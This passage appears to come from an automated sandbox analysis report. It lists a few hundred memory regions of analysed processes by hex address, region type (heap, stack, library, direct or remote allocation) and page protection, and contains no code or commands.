heap
|
page read and write
|
||
|
27070000
|
trusted library allocation
|
page read and write
|
||
|
22DF0A89000
|
heap
|
page read and write
|
||
|
592B000
|
trusted library allocation
|
page read and write
|
||
|
5681000
|
trusted library allocation
|
page read and write
|
||
|
7FFD341E0000
|
trusted library allocation
|
page read and write
|
||
|
7FA7000
|
stack
|
page read and write
|
||
|
7540000
|
trusted library allocation
|
page read and write
|
||
|
267E3000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
206406D4000
|
heap
|
page read and write
|
||
|
2E16000
|
trusted library allocation
|
page execute and read and write
|
||
|
8D70000
|
direct allocation
|
page execute and read and write
|
||
|
2146A62F000
|
heap
|
page read and write
|
||
|
26EF0000
|
trusted library allocation
|
page read and write
|
||
|
85B0000
|
trusted library allocation
|
page read and write
|
||
|
27070000
|
trusted library allocation
|
page read and write
|
||
|
21400ABD000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
26820000
|
trusted library allocation
|
page read and write
|
||
|
22DF0A8C000
|
heap
|
page read and write
|
||
|
22DF0AFF000
|
heap
|
page read and write
|
||
|
7FFD33E5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34140000
|
trusted library allocation
|
page read and write
|
||
|
26260000
|
trusted library allocation
|
page read and write
|
||
|
214102EA000
|
trusted library allocation
|
page read and write
|
||
|
22DF0ECD000
|
heap
|
page read and write
|
||
|
7FFD34160000
|
trusted library allocation
|
page read and write
|
||
|
2146A490000
|
heap
|
page read and write
|
||
|
23EBA000
|
stack
|
page read and write
|
||
|
7FFD33F0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2900000
|
heap
|
page read and write
|
||
|
8800000
|
direct allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0B02000
|
heap
|
page read and write
|
||
|
6E4E000
|
stack
|
page read and write
|
||
|
5691000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0A65000
|
heap
|
page read and write
|
||
|
6A4E000
|
stack
|
page read and write
|
||
|
2E10000
|
trusted library allocation
|
page read and write
|
||
|
2CDE000
|
stack
|
page read and write
|
||
|
26810000
|
trusted library allocation
|
page read and write
|
||
|
21469FD0000
|
heap
|
page execute and read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
45FE000
|
stack
|
page read and write
|
||
|
8050000
|
heap
|
page read and write
|
||
|
22DF0A73000
|
heap
|
page read and write
|
||
|
26300000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34060000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
26850000
|
trusted library allocation
|
page execute and read and write
|
||
|
23DD000
|
stack
|
page read and write
|
||
|
214014CA000
|
trusted library allocation
|
page read and write
|
||
|
214683E1000
|
heap
|
page read and write
|
||
|
C0F2000
|
direct allocation
|
page execute and read and write
|
||
|
7322000
|
heap
|
page read and write
|
||
|
21401DBA000
|
trusted library allocation
|
page read and write
|
||
|
4B67BFF000
|
stack
|
page read and write
|
||
|
22DF0ABA000
|
heap
|
page read and write
|
||
|
26F00000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0AA9000
|
heap
|
page read and write
|
||
|
2CFF000
|
stack
|
page read and write
|
||
|
214683D5000
|
heap
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
25139000
|
trusted library allocation
|
page read and write
|
||
|
4E90000
|
trusted library allocation
|
page read and write
|
||
|
22DF0ED3000
|
heap
|
page read and write
|
||
|
8150000
|
trusted library allocation
|
page execute and read and write
|
||
|
88E7000
|
heap
|
page read and write
|
||
|
22DF0B20000
|
heap
|
page read and write
|
||
|
26260000
|
trusted library allocation
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
22DF0B20000
|
heap
|
page read and write
|
||
|
7390000
|
trusted library allocation
|
page read and write
|
||
|
2A90000
|
trusted library section
|
page read and write
|
||
|
2146A910000
|
heap
|
page read and write
|
||
|
26E20000
|
trusted library allocation
|
page read and write
|
||
|
824E000
|
stack
|
page read and write
|
||
|
22DF0AC2000
|
heap
|
page read and write
|
||
|
6052000
|
remote allocation
|
page execute and read and write
|
||
|
22DF0AA4000
|
heap
|
page read and write
|
||
|
22DF0AB9000
|
heap
|
page read and write
|
||
|
22DEEBD0000
|
heap
|
page read and write
|
||
|
7FFD33FF0000
|
trusted library allocation
|
page read and write
|
||
|
7DF419C40000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E20000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
4660000
|
trusted library allocation
|
page read and write
|
||
|
2D50000
|
trusted library allocation
|
page read and write
|
||
|
20640340000
|
heap
|
page read and write
|
||
|
21401C1F000
|
trusted library allocation
|
page read and write
|
||
|
22DF0ABE000
|
heap
|
page read and write
|
||
|
8790000
|
direct allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
2146A61A000
|
heap
|
page read and write
|
||
|
80A0000
|
heap
|
page read and write
|
||
|
22DF0F0A000
|
heap
|
page read and write
|
||
|
6E0A000
|
stack
|
page read and write
|
||
|
7FFD34130000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0A61000
|
heap
|
page read and write
|
||
|
22DF0ED3000
|
heap
|
page read and write
|
||
|
26820000
|
trusted library allocation
|
page read and write
|
||
|
22DF0AB4000
|
heap
|
page read and write
|
||
|
88DE000
|
stack
|
page read and write
|
||
|
710E000
|
stack
|
page read and write
|
||
|
22DF0EB0000
|
heap
|
page read and write
|
||
|
2E27000
|
trusted library allocation
|
page execute and read and write
|
||
|
267D3000
|
trusted library allocation
|
page read and write
|
||
|
8110000
|
trusted library allocation
|
page read and write
|
||
|
2B2B000
|
heap
|
page read and write
|
||
|
22DF0AC2000
|
heap
|
page read and write
|
||
|
84EC000
|
heap
|
page read and write
|
||
|
2146A64A000
|
heap
|
page read and write
|
||
|
26116000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
47D8000
|
trusted library allocation
|
page read and write
|
||
|
E8F11BA000
|
stack
|
page read and write
|
||
|
7FFD33E60000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
838C000
|
stack
|
page read and write
|
||
|
24100000
|
heap
|
page read and write
|
||
|
2740000
|
heap
|
page read and write
|
||
|
22DF0A99000
|
heap
|
page read and write
|
||
|
22DF0A8D000
|
heap
|
page read and write
|
||
|
2C98000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0AC2000
|
heap
|
page read and write
|
||
|
7FFD33EAC000
|
trusted library allocation
|
page execute and read and write
|
||
|
22DF0ABE000
|
heap
|
page read and write
|
||
|
74DE000
|
stack
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
20640300000
|
heap
|
page read and write
|
||
|
4341EFE000
|
stack
|
page read and write
|
||
|
7FFD340E0000
|
trusted library allocation
|
page read and write
|
||
|
6D2E000
|
stack
|
page read and write
|
||
|
26FE000
|
stack
|
page read and write
|
||
|
2146A61E000
|
heap
|
page read and write
|
||
|
2613D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33F00000
|
trusted library allocation
|
page read and write
|
||
|
8780000
|
direct allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
267F2000
|
trusted library allocation
|
page read and write
|
||
|
6A52000
|
remote allocation
|
page execute and read and write
|
||
|
7FB0000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
2BF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
22DF0A61000
|
heap
|
page read and write
|
||
|
21400228000
|
trusted library allocation
|
page read and write
|
||
|
214684E5000
|
heap
|
page read and write
|
||
|
4342DCE000
|
stack
|
page read and write
|
||
|
A2F2000
|
direct allocation
|
page execute and read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0B20000
|
heap
|
page read and write
|
||
|
828C000
|
stack
|
page read and write
|
||
|
23B1F000
|
stack
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
22DEECA8000
|
heap
|
page read and write
|
||
|
6E8C000
|
stack
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
E8F1DFB000
|
stack
|
page read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
7248000
|
heap
|
page read and write
|
||
|
804D000
|
stack
|
page read and write
|
||
|
708E000
|
stack
|
page read and write
|
||
|
22DF0B05000
|
heap
|
page read and write
|
||
|
21469D10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34120000
|
trusted library allocation
|
page read and write
|
||
|
2140203A000
|
trusted library allocation
|
page read and write
|
||
|
7F7E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D20000
|
trusted library section
|
page read and write
|
||
|
72B1000
|
heap
|
page read and write
|
||
|
22DEED7B000
|
heap
|
page read and write
|
||
|
834E000
|
stack
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
22DEED24000
|
heap
|
page read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
22DEED7E000
|
heap
|
page read and write
|
||
|
22DEED1F000
|
heap
|
page read and write
|
||
|
7FFD340C0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0A87000
|
heap
|
page read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
4342E4E000
|
stack
|
page read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
21469E75000
|
heap
|
page read and write
|
||
|
23C5F000
|
stack
|
page read and write
|
||
|
7FFD341C0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0C01000
|
heap
|
page read and write
|
||
|
4B67AFF000
|
unkown
|
page read and write
|
||
|
23BD0000
|
trusted library allocation
|
page read and write
|
||
|
E8F15FE000
|
stack
|
page read and write
|
||
|
2611B000
|
trusted library allocation
|
page read and write
|
||
|
869E000
|
stack
|
page read and write
|
||
|
26EF0000
|
trusted library allocation
|
page read and write
|
||
|
2D30000
|
trusted library allocation
|
page read and write
|
||
|
6DCD000
|
stack
|
page read and write
|
||
|
22DF0A75000
|
heap
|
page read and write
|
||
|
22DEED40000
|
heap
|
page read and write
|
||
|
85F0000
|
direct allocation
|
page read and write
|
||
|
2B38000
|
heap
|
page read and write
|
||
|
22DF0A63000
|
heap
|
page read and write
|
||
|
26FEF000
|
stack
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
21469E89000
|
heap
|
page read and write
|
||
|
6B0F000
|
stack
|
page read and write
|
||
|
434207E000
|
stack
|
page read and write
|
||
|
841F000
|
heap
|
page read and write
|
||
|
7590000
|
trusted library allocation
|
page read and write
|
||
|
8460000
|
heap
|
page readonly
|
||
|
22DF0F10000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
56E8000
|
trusted library allocation
|
page read and write
|
||
|
240FE000
|
stack
|
page read and write
|
||
|
6A8E000
|
stack
|
page read and write
|
||
|
2D90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34020000
|
trusted library allocation
|
page execute and read and write
|
||
|
22DF0EBD000
|
heap
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0EBC000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
7141000
|
heap
|
page read and write
|
||
|
22DEED1D000
|
heap
|
page read and write
|
||
|
23D0E000
|
stack
|
page read and write
|
||
|
22DEED3F000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
24192000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33F36000
|
trusted library allocation
|
page execute and read and write
|
||
|
270A0000
|
trusted library allocation
|
page read and write
|
||
|
2146A3DC000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
2A3E000
|
stack
|
page read and write
|
||
|
22DF0AC2000
|
heap
|
page read and write
|
||
|
26830000
|
trusted library allocation
|
page read and write
|
||
|
7253000
|
heap
|
page read and write
|
||
|
22DEED03000
|
heap
|
page read and write
|
||
|
2146A390000
|
heap
|
page read and write
|
||
|
2E25000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E30000
|
trusted library allocation
|
page execute and read and write
|
||
|
22DEECF8000
|
heap
|
page read and write
|
||
|
266BE000
|
stack
|
page read and write
|
||
|
4342FCB000
|
stack
|
page read and write
|
||
|
265DE000
|
stack
|
page read and write
|
||
|
22DF0A9C000
|
heap
|
page read and write
|
||
|
22DF0A70000
|
heap
|
page read and write
|
||
|
2146841E000
|
heap
|
page read and write
|
||
|
22DF0A71000
|
heap
|
page read and write
|
||
|
26110000
|
trusted library allocation
|
page read and write
|
||
|
2146A396000
|
heap
|
page read and write
|
||
|
23B5D000
|
stack
|
page read and write
|
||
|
26850000
|
trusted library allocation
|
page read and write
|
||
|
2BF0000
|
trusted library allocation
|
page read and write
|
||
|
8640000
|
direct allocation
|
page read and write
|
||
|
21469CA0000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
2D40000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0ECD000
|
heap
|
page read and write
|
||
|
25111000
|
trusted library allocation
|
page read and write
|
||
|
27070000
|
trusted library allocation
|
page read and write
|
||
|
26804000
|
trusted library allocation
|
page read and write
|
||
|
267C8000
|
trusted library allocation
|
page read and write
|
||
|
27B0000
|
heap
|
page read and write
|
||
|
2682D000
|
stack
|
page read and write
|
||
|
6B4E000
|
stack
|
page read and write
|
||
|
85D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD341B0000
|
trusted library allocation
|
page read and write
|
||
|
22DEEFF5000
|
heap
|
page read and write
|
||
|
2418A000
|
trusted library allocation
|
page read and write
|
||
|
434237E000
|
stack
|
page read and write
|
||
|
85E0000
|
direct allocation
|
page read and write
|
||
|
98F2000
|
direct allocation
|
page execute and read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
22DEEC80000
|
heap
|
page read and write
|
||
|
22DEED1D000
|
heap
|
page read and write
|
||
|
23FAF000
|
stack
|
page read and write
|
||
|
6D6A000
|
stack
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34010000
|
trusted library allocation
|
page execute and read and write
|
||
|
26840000
|
trusted library allocation
|
page read and write
|
||
|
26150000
|
trusted library allocation
|
page read and write
|
||
|
22DEED07000
|
heap
|
page read and write
|
||
|
7FFD34070000
|
trusted library allocation
|
page read and write
|
||
|
270A0000
|
trusted library allocation
|
page read and write
|
||
|
27080000
|
trusted library allocation
|
page read and write
|
||
|
27070000
|
trusted library allocation
|
page read and write
|
||
|
240BC000
|
stack
|
page read and write
|
||
|
2D6A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2146A609000
|
heap
|
page read and write
|
||
|
83E5000
|
heap
|
page read and write
|
||
|
26810000
|
trusted library allocation
|
page read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
21400ACA000
|
trusted library allocation
|
page read and write
|
||
|
87F0000
|
direct allocation
|
page read and write
|
||
|
26840000
|
trusted library allocation
|
page read and write
|
||
|
22DF0A91000
|
heap
|
page read and write
|
||
|
7FFD33E54000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34180000
|
trusted library allocation
|
page read and write
|
||
|
809E000
|
stack
|
page read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
8610000
|
direct allocation
|
page read and write
|
||
|
21469D00000
|
heap
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34170000
|
trusted library allocation
|
page read and write
|
||
|
40D0000
|
remote allocation
|
page execute and read and write
|
||
|
22DF0A61000
|
heap
|
page read and write
|
||
|
2E12000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
2415D000
|
trusted library allocation
|
page read and write
|
||
|
26260000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
88E0000
|
heap
|
page read and write
|
||
|
22DF0EB7000
|
heap
|
page read and write
|
||
|
206402D0000
|
heap
|
page read and write
|
||
|
84F8000
|
heap
|
page read and write
|
||
|
7380000
|
trusted library allocation
|
page read and write
|
||
|
21410001000
|
trusted library allocation
|
page read and write
|
||
|
7FE0000
|
trusted library allocation
|
page read and write
|
||
|
263C7000
|
heap
|
page read and write
|
||
|
26810000
|
trusted library allocation
|
page read and write
|
||
|
21468350000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
28AE000
|
stack
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
E8F17FE000
|
stack
|
page read and write
|
||
|
2C90000
|
heap
|
page read and write
|
||
|
83A4000
|
heap
|
page read and write
|
||
|
745E000
|
stack
|
page read and write
|
||
|
8660000
|
direct allocation
|
page read and write
|
||
|
8650000
|
direct allocation
|
page read and write
|
||
|
45A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
214021F0000
|
trusted library allocation
|
page read and write
|
||
|
27070000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34040000
|
trusted library allocation
|
page execute and read and write
|
||
|
8440000
|
heap
|
page read and write
|
||
|
86DE000
|
stack
|
page read and write
|
||
|
2E1A000
|
trusted library allocation
|
page execute and read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
26830000
|
trusted library allocation
|
page read and write
|
||
|
26326000
|
heap
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0ED3000
|
heap
|
page read and write
|
||
|
22DF0A8D000
|
heap
|
page read and write
|
||
|
26830000
|
trusted library allocation
|
page read and write
|
||
|
7370000
|
trusted library allocation
|
page read and write
|
||
|
26810000
|
trusted library allocation
|
page read and write
|
||
|
22DEED1F000
|
heap
|
page read and write
|
||
|
87E0000
|
direct allocation
|
page read and write
|
||
|
84CD000
|
heap
|
page read and write
|
||
|
2146A590000
|
heap
|
page read and write
|
||
|
43419A3000
|
stack
|
page read and write
|
||
|
21402037000
|
trusted library allocation
|
page read and write
|
||
|
26820000
|
trusted library allocation
|
page read and write
|
||
|
86C0000
|
direct allocation
|
page read and write
|
||
|
24111000
|
trusted library allocation
|
page read and write
|
||
|
26310000
|
remote allocation
|
page read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
2E0D000
|
trusted library allocation
|
page execute and read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
214102F9000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0A81000
|
heap
|
page read and write
|
||
|
21400AA5000
|
trusted library allocation
|
page read and write
|
||
|
26830000
|
trusted library allocation
|
page read and write
|
||
|
75A0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0C02000
|
heap
|
page read and write
|
||
|
22DF0AC2000
|
heap
|
page read and write
|
||
|
7580000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
21469CD0000
|
heap
|
page readonly
|
||
|
7FFD34110000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
2140218F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34150000
|
trusted library allocation
|
page read and write
|
||
|
85A0000
|
trusted library allocation
|
page read and write
|
||
|
73F0000
|
heap
|
page execute and read and write
|
||
|
4608000
|
trusted library allocation
|
page read and write
|
||
|
27090000
|
trusted library allocation
|
page read and write
|
||
|
2D70000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
4341D7E000
|
stack
|
page read and write
|
||
|
27070000
|
trusted library allocation
|
page read and write
|
||
|
2064034B000
|
heap
|
page read and write
|
||
|
7FFD33E50000
|
trusted library allocation
|
page read and write
|
||
|
2A7F000
|
stack
|
page read and write
|
||
|
2140052B000
|
trusted library allocation
|
page read and write
|
||
|
214008EC000
|
trusted library allocation
|
page read and write
|
||
|
8620000
|
direct allocation
|
page read and write
|
||
|
7FFD34001000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0B60000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD341D0000
|
trusted library allocation
|
page read and write
|
||
|
21400A62000
|
trusted library allocation
|
page read and write
|
||
|
2146A607000
|
heap
|
page read and write
|
||
|
20640510000
|
heap
|
page read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
82CC000
|
stack
|
page read and write
|
||
|
2D43000
|
trusted library allocation
|
page execute and read and write
|
||
|
86B0000
|
direct allocation
|
page read and write
|
||
|
4342F4B000
|
stack
|
page read and write
|
||
|
2BE0000
|
trusted library allocation
|
page read and write
|
||
|
21469DE7000
|
heap
|
page execute and read and write
|
||
|
2860000
|
heap
|
page read and write
|
||
|
6B90000
|
heap
|
page execute and read and write
|
||
|
26136000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
26EF0000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
22DEED7A000
|
heap
|
page read and write
|
||
|
22DF0A60000
|
heap
|
page read and write
|
||
|
8570000
|
direct allocation
|
page read and write
|
||
|
22DF0AB4000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0EE3000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
4670000
|
heap
|
page execute and read and write
|
||
|
24188000
|
trusted library allocation
|
page read and write
|
||
|
2748000
|
stack
|
page read and write
|
||
|
8EF2000
|
direct allocation
|
page execute and read and write
|
||
|
22DF0710000
|
heap
|
page read and write
|
||
|
2BFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
23D50000
|
heap
|
page read and write
|
||
|
7FFD33F70000
|
trusted library allocation
|
page execute and read and write
|
||
|
214684E0000
|
heap
|
page read and write
|
||
|
2E2B000
|
trusted library allocation
|
page execute and read and write
|
||
|
22DF0CB1000
|
heap
|
page read and write
|
||
|
8670000
|
direct allocation
|
page read and write
|
||
|
2D4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
22DF0A66000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
27070000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
2DBC000
|
heap
|
page read and write
|
||
|
22DEED1F000
|
heap
|
page read and write
|
||
|
22DEEBC0000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
206406D0000
|
heap
|
page read and write
|
||
|
22DF0A68000
|
heap
|
page read and write
|
||
|
7FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21469D40000
|
trusted library allocation
|
page read and write
|
||
|
270C000
|
stack
|
page read and write
|
||
|
21401C1B000
|
trusted library allocation
|
page read and write
|
||
|
8470000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
8585000
|
heap
|
page read and write
|
||
|
66BD000
|
stack
|
page read and write
|
||
|
24050000
|
trusted library allocation
|
page read and write
|
||
|
22DF0A7B000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
22DEED34000
|
heap
|
page read and write
|
||
|
2140051D000
|
trusted library allocation
|
page read and write
|
||
|
22DF0CB0000
|
heap
|
page read and write
|
||
|
2B0C000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
56A9000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
26EAF000
|
stack
|
page read and write
|
||
|
46E2000
|
trusted library allocation
|
page read and write
|
||
|
263E5000
|
heap
|
page read and write
|
||
|
267DD000
|
trusted library allocation
|
page read and write
|
||
|
728E000
|
heap
|
page read and write
|
||
|
21410309000
|
trusted library allocation
|
page read and write
|
||
|
21401E38000
|
trusted library allocation
|
page read and write
|
||
|
206402E0000
|
heap
|
page read and write
|
||
|
7FFD340A0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0BD1000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
43423FB000
|
stack
|
page read and write
|
||
|
2D1E000
|
stack
|
page read and write
|
||
|
8770000
|
direct allocation
|
page read and write
|
||
|
22DF0ED3000
|
heap
|
page read and write
|
||
|
26860000
|
trusted library allocation
|
page read and write
|
||
|
2A0F000
|
unkown
|
page read and write
|
||
|
22DF0C03000
|
heap
|
page read and write
|
||
|
22DEECBE000
|
heap
|
page read and write
|
||
|
27080000
|
trusted library allocation
|
page read and write
|
||
|
885E000
|
stack
|
page read and write
|
||
|
22DF0EE0000
|
heap
|
page read and write
|
||
|
22DF0AC2000
|
heap
|
page read and write
|
||
|
22DF0AC2000
|
heap
|
page read and write
|
||
|
22DEECA9000
|
heap
|
page read and write
|
||
|
2146A3DE000
|
heap
|
page read and write
|
||
|
4681000
|
trusted library allocation
|
page read and write
|
||
|
8160000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
22DEED7B000
|
heap
|
page read and write
|
||
|
26160000
|
trusted library allocation
|
page read and write
|
||
|
21400AC8000
|
trusted library allocation
|
page read and write
|
||
|
27070000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
261DC000
|
stack
|
page read and write
|
||
|
22DF0A83000
|
heap
|
page read and write
|
||
|
6EA0000
|
heap
|
page read and write
|
||
|
7400000
|
trusted library allocation
|
page read and write
|
||
|
270B0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0AA1000
|
heap
|
page read and write
|
||
|
22DF0AFF000
|
heap
|
page read and write
|
||
|
22DF0BB4000
|
heap
|
page read and write
|
||
|
7FFD33F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
4341E7E000
|
stack
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
21401FC9000
|
trusted library allocation
|
page read and write
|
||
|
263E8000
|
heap
|
page read and write
|
||
|
4341CFE000
|
stack
|
page read and write
|
||
|
2661E000
|
stack
|
page read and write
|
||
|
7E52000
|
remote allocation
|
page execute and read and write
|
||
|
24060000
|
heap
|
page execute and read and write
|
||
|
730B000
|
heap
|
page read and write
|
||
|
8105000
|
trusted library allocation
|
page read and write
|
||
|
8390000
|
heap
|
page read and write
|
||
|
25178000
|
trusted library allocation
|
page read and write
|
||
|
761C000
|
stack
|
page read and write
|
||
|
2146A61C000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
4252000
|
remote allocation
|
page execute and read and write
|
||
|
26EEE000
|
stack
|
page read and write
|
||
|
21469CC0000
|
trusted library allocation
|
page read and write
|
||
|
87C0000
|
direct allocation
|
page read and write
|
||
|
21401C04000
|
trusted library allocation
|
page read and write
|
||
|
2612E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3400A000
|
trusted library allocation
|
page read and write
|
||
|
2681E000
|
trusted library allocation
|
page read and write
|
||
|
22DEEBF0000
|
heap
|
page read and write
|
||
|
2146A5BB000
|
heap
|
page read and write
|
||
|
E8F1BFE000
|
stack
|
page read and write
|
||
|
7240000
|
heap
|
page read and write
|
||
|
22DEED75000
|
heap
|
page read and write
|
||
|
27070000
|
trusted library allocation
|
page read and write
|
||
|
2146A5CE000
|
heap
|
page read and write
|
||
|
83F1000
|
heap
|
page read and write
|
||
|
465C000
|
stack
|
page read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
23EF8000
|
stack
|
page read and write
|
||
|
22DEED2A000
|
heap
|
page read and write
|
||
|
4B6773D000
|
stack
|
page read and write
|
||
|
21401934000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0C01000
|
heap
|
page read and write
|
||
|
24186000
|
trusted library allocation
|
page read and write
|
||
|
4C52000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD33E70000
|
trusted library allocation
|
page read and write
|
||
|
27070000
|
trusted library allocation
|
page read and write
|
||
|
459E000
|
stack
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
4342ECD000
|
stack
|
page read and write
|
||
|
22DF0A70000
|
heap
|
page read and write
|
||
|
7417000
|
trusted library allocation
|
page read and write
|
||
|
26867000
|
trusted library allocation
|
page read and write
|
||
|
